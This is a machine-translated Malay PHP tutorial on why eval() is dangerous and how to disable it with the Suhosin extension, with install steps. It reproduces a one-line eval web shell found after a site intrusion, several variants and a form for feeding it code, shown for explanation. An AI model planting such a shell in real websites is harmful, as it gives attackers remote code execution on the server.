Bagaimana untuk melarang eval dengan risiko keselamatan dalam php

Sebelum tapak web diserang oleh penggodam, kami mengetahui bahawa fungsi eval PHP mempunyai risiko keselamatan yang besar. Hari ini kami akan memperkenalkan kaedah melumpuhkan eval Anda boleh merujuknya jika perlu.

Beberapa masa lalu, laman web itu telah diceroboh oleh penggodam Kemudian, semasa siasatan, php ditemui dengan kandungan yang sangat sedikit:

<?php eval($_POST[asda123131323156341]);?>

Kemudian saya mencari fungsi eval PHP dalam talian dan mendapati bahawa fungsi eval ini mempunyai risiko keselamatan yang besar.

Uji secara setempat, tulis php dalam persekitaran setempat, kandungannya adalah seperti berikut:

default.php:

<?php eval($_GET[asda]);?>

Kemudian lawati: localhost/test/ default.php ?asda=phpinfo();

Anda boleh melihat bahawa phpinfo telah dilaksanakan.

Atau lawati localhost/test/default.php?asda = echo 11111 anda juga akan mendapati bahawa 1111 dikumandangkan.

Kaedah yang serupa termasuk:

<?php $code="${${eval($_GET[c])}}";?>

Lawati localhost/test/default.php?c=phpinfo(); anda boleh melihat

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?>

Akses localhost/test /default.php?c= ${${phpinfo()}}; anda boleh melihat

Menggunakan fungsi eval yang boleh melaksanakan php, penggodam boleh menggunakan ini untuk memuat naik beberapa Trojan latar belakang, contohnya Muat naik php, dan kemudian akses php ini melalui url untuk mendapatkan kebenaran yang lebih besar. Pencerobohan jenis ini dipanggil Trojan satu ayat. Contohnya: tulis html dengan kandungan berikut:

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

dan kemudian tulis default.php dengan kandungan:

<?php eval($_POST[c]);?>

Dalam kes ini, apakah php yang anda mahu laksanakan? Anda boleh menyerahkannya terus untuk dijalankan.

Jadi: eval() mempunyai kuasa pemusnah yang hebat untuk keselamatan PHP Fungsi eval melemahkan keselamatan aplikasi anda, ia biasanya tidak digunakan untuk mengelakkan pencerobohan kuda Trojan seperti ayat berikut diharamkan!

Walau bagaimanapun, banyak kaedah di Internet yang menggunakan disable_functions untuk melumpuhkan eval adalah salah!

Malah, eval() tidak boleh dilumpuhkan menggunakan disable_functions dalam php.ini:

kerana eval() ialah binaan bahasa dan bukan fungsi

eval ialah zend , jadi ia bukan fungsi PHP_FUNCTION;

Jadi bagaimanakah PHP melarang eval?

Jika anda ingin melumpuhkan eval, anda boleh menggunakan sambungan php Suhosin:

Selepas memasang Suhosin, muatkan Suhosin.so dalam php.ini, dan tambah suhosin.executor.disable_eval = on !

Untuk meringkaskan, fungsi eval php tidak boleh dilumpuhkan dalam php, jadi kami hanya boleh menggunakan pemalam!

Bagi langkah-langkah memasang suhosin untuk melumpuhkan fungsi eval: (tidak diuji)

Arahan:

direktori pemasangan php: /usr/local/php5

laluan fail konfigurasi php.ini: /usr/local/php5/etc/php.ini

Direktori pemasangan Nginx: /usr/local/nginx

Direktori akar tapak web Nginx: / usr/ local/nginx/html

1. Pasang alatan kompilasi

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2

cd /usr/local/src   #进入软件包存放目录
wget  http://download.suhosin.org/suhosin-0.9.33.tgz    #下载
tar zxvf suhosin-0.9.33.tgz   #解压
cd suhosin-0.9.33   #进入安装目录
/usr/local/php5/bin/phpize   #用phpize生成configure配置文件
./configure  --with-php-config=/usr/local/php5/bin/php-config   #配置
make   #编译
make install   #安装
安装完成之后，出现下面的界面，记住以下路径，后面会用到。
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   #suhosin模块路径

Nota: Fungsi suhosin.executor.disable_eval = on adalah untuk melumpuhkan fungsi eval

4.

vi /usr/local/php5/etc/php.ini  
 #编辑配置文件，在最后一行添加以下内容 
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

vi /usr/local/nginx/html/phpinfo .php #Edit

:wq! #Simpan dan keluar

perkhidmatan php-fpm dimulakan semula #Restartphp-fpm

<?php
phpinfo();
?>

perkhidmatan nginx dimulakan semula #Restart nginx

Nota: Perkara yang sama berlaku untuk apache, cuma mulakan semula apache.

Buka phpinfo.php dalam pelayar Seperti yang ditunjukkan dalam rajah di bawah, anda boleh melihat maklumat berkaitan suhosin

Pada ketika ini, pemasangan suhosin. php di bawah Linux selesai!

Nota: Apakah akibat selepas melumpuhkan eval? Pertama sekali, perisian yang menggunakan eval dalam kod tidak akan dapat menggunakannya, seperti Forum Discuz yang terkenal dan PHPWind Forum tidak akan dapat digunakan secara normal, dan ia juga akan menjejaskan versi lama phpMyAdmin ia dikemas kini kepada 3.2.5 terkini, ia boleh digunakan, tetapi ia tersedia secara lalai Untuk amaran, tambah $cfg['SuhosinDisableWarning']=true; batalkan amaran ini.

Nota: Selain eval, assert juga digunakan dengan cara yang sama.

Pembelajaran yang disyorkan:

tutorial video php

Atas ialah kandungan terperinci Bagaimana untuk melarang eval dengan risiko keselamatan dalam php. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!